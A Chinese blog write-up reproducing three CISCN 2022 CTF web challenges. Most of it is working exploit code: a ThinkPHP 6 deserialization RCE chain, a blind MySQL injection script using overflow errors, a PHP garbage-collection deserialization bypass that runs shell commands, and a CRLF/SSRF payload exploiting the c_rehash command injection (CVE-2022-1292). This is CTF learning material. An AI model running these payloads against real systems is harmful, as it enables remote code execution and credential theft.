CISCN 2022 初赛 web 复现

最新推荐文章于 2023-10-25 13:14:02 发布
最新推荐文章于 2023-10-25 13:14:02 发布
阅读量1.6k 收藏 5
点赞数
分类专栏: 比赛复现 文章标签: 比赛复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127866492
版权

[CISCN 2022 初赛]ezpop

可以看到版本,那么直接上网找链子打
在这里插入图片描述
www.zip 查看路由,是 Index/test,然后 post 传参 a
在这里插入图片描述

<?php
// 保证命名空间的一致
namespace think {
    // Model需要是抽象类
    abstract class Model {
        // 需要用到的关键字
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;

        // 初始化
        public function __construct($obj='') {
            $this->lazySave = true;
            $this->data = ['whoami'=>['whoami']];
            $this->exists = true;
            $this->table = $obj;    // 触发__toString
            $this->withAttr = ['whoami'=>['system']];
            $this->json = ['whoami'];
            $this->jsonAssoc = true;
        }
    }
}

namespace think\model {
    use think\Model;
    class Pivot extends Model {
        
    }
    
    // 实例化
    $p = new Pivot(new Pivot());
    echo urlencode(serialize($p));
}

在这里插入图片描述

ezpentest

知识点:mysql8的utf8mb4_bin应用,根据溢出报错盲注,php的GC回收机制

题目给了 waf

<?php
function safe($a) {
    $r = preg_replace('/[\s,()#;*~\-]/','',$a);
    $r = preg_replace('/^.*(?=union|binary|regexp|rlike).*$/i','',$r);
    return (string)$r;
  }
?>

利用 case when... 代替 if(...) ,利用 like 匹配 usernamepassword,如果匹配到则 9223372036854775807+1 造成溢出,然后就会报错,浏览器会返回500,根据这个就可以进行盲注,最后利用 collate'utf8mb4_bin'判断大小写。
在这里插入图片描述

import requests
import string

url = "http://1.14.71.254:28126/login.php"
list = string.ascii_letters + string.digits + '^$!_%@&'

flag = ''
for i in range(1,50):
    for j in list:
        if (j in '%_'):#为防止 like 把这里的 % 当做正则,所以要转义一下
            j = "\\" + j
        payload = f"0'||case'1'when`password`collate'utf8mb4_bin'like'{flag+j}%'then+9223372036854775807+1+''else'0'end||'"
        data = {
            'username':payload,
            'password':123
        }
        r = requests.post(url,data=data)
        if r.status_code == 500:
            flag += j
            print(flag)
            break
 #nssctfwabbybaboo!@$%!!
 #PAssw40d_Y0u3_Never_Konwn!@!!

登录后看到一大串乱码,查看源码可以看到它所用的加密。
在这里插入图片描述
保存网页源码后,利用工具解密

curl http://1.14.71.254:28943/login.php --cookie "PHPSESSID=c49750cf8b201ad00e8156ed3bb3aacf" -o ./example.php

1Nd3x_Y0u_N3v3R_Kn0W.php

<?php
session_start();
if(!isset($_SESSION['login'])){
    die();
}
function Al($classname){
    include $classname.".php";
}

if(isset($_REQUEST['a'])){
    $c = $_REQUEST['a'];
    $o = unserialize($c);
    if($o === false) {
        die("Error Format");
    }else{
        spl_autoload_register('Al');
        $o = unserialize($c);
        $raw = serialize($o);
        if(preg_match("/Some/i",$raw)){
            throw new Error("Error");
        }
        $o = unserialize($raw);
        var_dump($o);
    }
}else {
    echo file_get_contents("SomeClass.php");
}

SomeClass.php 源码

<?php
class A
{
    public $a;
    public $b;
    public function see()
    {
        $b = $this->b;
        $checker = new ReflectionClass(get_class($b));
        if(basename($checker->getFileName()) != 'SomeClass.php'){
        //获取类所在文件名字
            if(isset($b->a)&&isset($b->b)){
                ($b->a)($b->b."");
            }
        }
    }
}
class B
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->see();
        return "1";
    }
}
class C
{
    public $a;
    public $b;
    public function __toString()
    {
        $this->a->read();
        return "lock lock read!";
    }
}
class D
{
    public $a;
    public $b;
    public function read()
    {
        $this->b->learn();
    }
}
class E
{
    public $a;
    public $b;
    public function __invoke()
    {
        $this->a = $this->b." Powered by PHP";
    }
    public function __destruct(){
        //eval($this->a); ??? 吓得我赶紧把后门注释了
        //echo "???";
        die($this->a);
    }
}
class F
{
    public $a;
    public $b;
    public function __call($t1,$t2)
    {
        $s1 = $this->b;
        $s1();
    }
}
?>

链子很好构造

E::__destruct => B::__toString => A::see

但是直接序列化打,是肯定打不通的,为啥呢?

首先在 1Nd3x_Y0u_N3v3R_Kn0W.php 中,是不包含 SomeClass.php 里面的类的,怎么包含呢?

可以利用 spl_autoload_register('Al'); 自动加载类,但是在后面有过滤,字符串中补不能有 Some,也就是说我们要在 if 判断前销毁我们的反序列化对象以此提前调用 __destruct,也就是常说的 phpGC 回收机制。

这边就不详细讲了,想详细了解的移步:https://www.jb51.net/article/242682.htm

简单解释就是,用一个指针指向这个对象,之后在把这个指针指向其他地方,这样这个对象,就没有任何引用和指向,就会销毁,从而调用 __destruct

$o = unserialize($c);
$raw = serialize($o);
if(preg_match("/Some/i",$raw)){
            throw new Error("Error");
        }

payload:

<?php
class A
{
    public $a;
    public $b;
}
class B
{
    public $a;
    public $b;

}

class E
{
    public $a;
    public $b;
}

class SomeClass{
    public $a;
}

$e = new E();
$b = new B();
$a = new A();
$flag = new error();
$flag->a = "system";
$flag->b = "cat /nssctfflag";
$a->b = $flag;
$b->a = $a;
$e->a = $b;
$c = new SomeClass();
$c->a = $e;
echo urlencode(str_replace("i:1;", "i:0;", serialize(array($c,1))));

online_crt

知识点:CVE-2022-1292,代码审计

分析

/getcrt 路由,生成 crt 证书

@app.route('/getcrt', methods=['GET', 'POST'])
def upload():
    Country = request.form.get("Country", "CN")
    Province = request.form.get("Province", "a")
    City = request.form.get("City", "a")
    OrganizationalName = request.form.get("OrganizationalName", "a")
    CommonName = request.form.get("CommonName", "a")
    EmailAddress = request.form.get("EmailAddress", "a")
    return get_crt(Country, Province, City, OrganizationalName, CommonName, EmailAddress)

/proxy 路由,请求头是可以控制的,也就是 CRLF,可以看到利用这个路由可以访问到内网 8887 端口,

@app.route('/proxy', methods=['GET'])
def proxy():
    uri = request.form.get("uri", "/")
    client = socket.socket()
    client.connect(('localhost', 8887))
    msg = f'''GET {uri} HTTP/1.1
Host: test_api_host
User-Agent: Guest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

'''
    client.send(msg.encode())
    data = client.recv(2048)
    client.close()
    return data.decode()

然后我们再看 go 服务,可以看到 go 跑在 8887 端口上,且在 admin 函数中可以改名字,那么我们是不是可以访问 8887 端口的 /admin/rename 路由,以此调用 admin 函数来改我们的证书的名字。但是在这里面还有几个条件:

  1. Request.Host == “admin”,host 要为 admin
  2. Request.URL.RawPath !=“”,也就是路径有编码,可以把 /改为 %2f
func admin(c *gin.Context) {
	staticPath := "/app/static/crt/"
	oldname := c.DefaultQuery("oldname", "")
	newname := c.DefaultQuery("newname", "")
	if oldname == "" || newname == "" || strings.Contains(oldname, "..") || strings.Contains(newname, "..") {
		c.String(500, "error")
		return
	}
	if c.Request.URL.RawPath != "" && c.Request.Host == "admin" {
		err := os.Rename(staticPath+oldname, staticPath+newname)
		if err != nil {
			return
		}
		c.String(200, newname)
		return
	}
	c.String(200, "no")
}
......
func main() {
	router := gin.Default()
	router.GET("/", index)
	router.GET("/admin/rename", admin)

	if err := router.Run(":8887"); err != nil {
		panic(err)
	}
}

那么能改证书的名字有什么用呢?这时候就是 /createlink 路由下的 info 函数,调用 c_rehash 获取证书的名字来 RCE

@app.route('/createlink', methods=['GET'])
def info():
    json_data = {"info": os.popen("c_rehash static/crt/ && ls static/crt/").read()}
    # c_rehash 作用是让openssl在证书目录中能够找到证书。
    return json.dumps(json_data)

步骤

首先:在 /proxy 路由中以 post 传 CRLF 的值。(注意 go 服务中的条件)
因为要post 传参,所以要加一个 Content-Type: application/x-www-form-urlencoded
在这里插入图片描述

payload:

/admin%252frename%3Foldname%3Dfd3d9ea7-7dd2-43e3-b6b3-f1fdd39c72ef.crt%26newname%3D%60echo%2520Y2F0IC8qIA%3D%3D%7Cbase64%2520--decode%7Cbash%3Eflag.txt%60.crt%20HTTP/1.1%0D%0AHost%3A%20admin%0D%0AConnection%3A%20close%0D%0A%0D%0A

然后访问 /createlink 执行命令
最后访问 /static/crt/flag.txt,获取 flag
在这里插入图片描述
在这里插入图片描述

reference

https://haoami.github.io/2022/07/24/2022-7-24-CISCN%202022%E5%88%9D%E8%B5%9B/
https://blog.csdn.net/qq_62078839/article/details/125144431
succ3
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cisco Web IOU 1.2.2-16 教程
11-06
Cisco Web IOU 1.2.2-16 教程!
思科CISCO WebIOU-on-Linux 使用说明英文版
07-16
思科CISCO WebIOU-on-Linux 使用说明英文版
第15届全国大学生知识竞赛场景实操 2022ciscn线上初赛 部分writeup
Nancy523的博客
05-29 2688
文章目录ez_usbeverlasting_night问卷调查签到电台Ezpop**基于挑战码的双向认证1、2**基于挑战码的双向认证3Iso9798Login-nomalBaby-tree ez_usb 拿到附件wireshark打开 观察 发现流量中存在两种arr 过滤 usb.addr == “2.8.1” && usbhid.data跟usb.addr == “2.10.1” && usbhid.data 分别导出为csv文件 提取hid data 梭哈脚本,
第十五届全国大学生信息安全竞赛(ciscn初赛) 部分writeup
volcano的博客
05-31 2457
CISCNwebEzpopmisceverlasting_nightez_usb问卷调查pwnlogin-nomalcrypto签到电台基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3 web Ezpop thinphp6.0.12LST反序列化链,www.zip 给源码,test路由里面a参数反序列化 利用链:ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户 <?php namespace think{ abstract class Mod
NSSCTF做题第9页(2)
wwwwyyyrre的博客
10-25 329
这道题主要有三个绕过点,第一个是__wakeup()函数,第二个是变量的MD5相等,但是两个变量不等那需要我们构造的两个类就是class lt和class fin构造的时候设置一个变量a,创建了一个类的对象lt然后把md5的条件满足一下,而这类的第一个变量$impo没有用到就可以利用它来指向下一个新创建的变量class fin,再利用fin里边的公共变量进行命令执行得到flagphpclass ltclass finpublic $a;
Thinkphp漏洞详解合集
Aiwin的博客
05-24 2872
Thinkphp漏洞合集详细分析(未完成)
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 3863
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1161
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
[CISCN 2022 东北]easycpp 复现
m0_75098930的博客
04-05 285
动调通过buf2找到密文,直接写回去就行了,注意密文需要逆序。flag长度为38,构造一个38位的字符串放进去动调。这里是加密逻辑,将输入的flag每四位为一轮异或,64位exe,无壳,直接动调看看基本逻辑。
[CISCN 2022 初赛]ezpentest
v2ish1yan的博客
07-25 1114
sql注入:盲注、`utf8mb4_bin`字符集的利用、`case when then else end` 的使用 php混淆解密:phpjiami混淆 php反序列化:原生类、`spl_autoload_register`函数、GC垃圾回收机制的利用
cisco-WEB界面配置路由器.pdf
07-12
web 界面玩路由器 2011/10/9 凌晨 2::55 WEB 界面配置路由器的命令 目前市场上很多思科路由器或者交换机都可以通过 WEB 方式配置了!尽管很多功能还是只 能通过 CLI 配置,但是一些功能还是很有用的,例如端口的...
2022 CISCN 创新能力实践赛初赛WP
Love&Share
05-31 1890
WP来自齐鲁师范学院网络安全社团 文章目录MISCez_usbeverlasting_nightbabydiskWEBEzpoponline_crtPWNlogin-nomalCRY基于挑战码的双向认证1基于挑战码的双向认证2基于挑战码的双向认证2签到电台ISO9798 MISC ez_usb 文件-导出特定分组 tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt ​ import os,sys ​ normalKeys = {.
[2022CISCN]初赛 复现
qq_61768489的博客
08-03 1442
在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出。发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。(如果您还需要进一步的提示,可在本公众号输入“豪密剖析”获取。仔细观察png数据块,通道隐藏的数据可以配合lsb隐写。发包示例:/send?..
CISCN2022全国初赛题解WriteUp-MapleLeaves
Do1phln的博客
06-04 2775
Do1phln b477ery sfc9982 0HBthinkphp 6.0.12lts 存在反序列化漏洞 https://www.freebuf.com/vuls/321546.html 扫描可知 www.zip 存在源码泄露,下载后可知存在反序列化路由 online_crt c_rehash 存在漏洞 https://www.secrss.com/articles/42602 CVE-2022-1292 先通过 /getcrt 获取文件名 再通过 /proxy 访问 go 服务更改文件名为命令 最
Thinkphp最新版本漏洞分析
kali_Ma的博客
02-27 4537
环境 Thinkphp6.0.12LTS(目前最新版本); PHP7.3.4。 安装 composer create-project topthink/think tp6 测试代码 漏洞分析 漏洞起点不是__desturct就是__wakeup全局搜索下,起点在vendor\topthink\think-orm\src\Model.php 只要把this->lazySave设为True,就会调用了save方法。 【一>所有资源获取<一】 1、网络安全学习路线 2、电子书籍(白帽子
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 1738
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
[CISCN 2022 初赛]online_crt
qq_62078839的博客
06-12 752
下载附件,查看app.py getcrt是生成证书的,createlink调用popen运行了c_rehashc_rehash 存在漏洞 https://www.secrss.com/articles/42602 CVE-2022-1292是当用户可控文件名时的命令注入再看到/proxy路由由用户构造报文,看看go 服务源码 可以通过 /proxy 来更改文件名为命令 最后通过 /createlink 调用 c_rehash 执行命令 得到一个证书利用脚本修改 利用/createlink调用
###对华为OD分布式操作系统的详细介绍
最新发布
05-22
华为OD
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值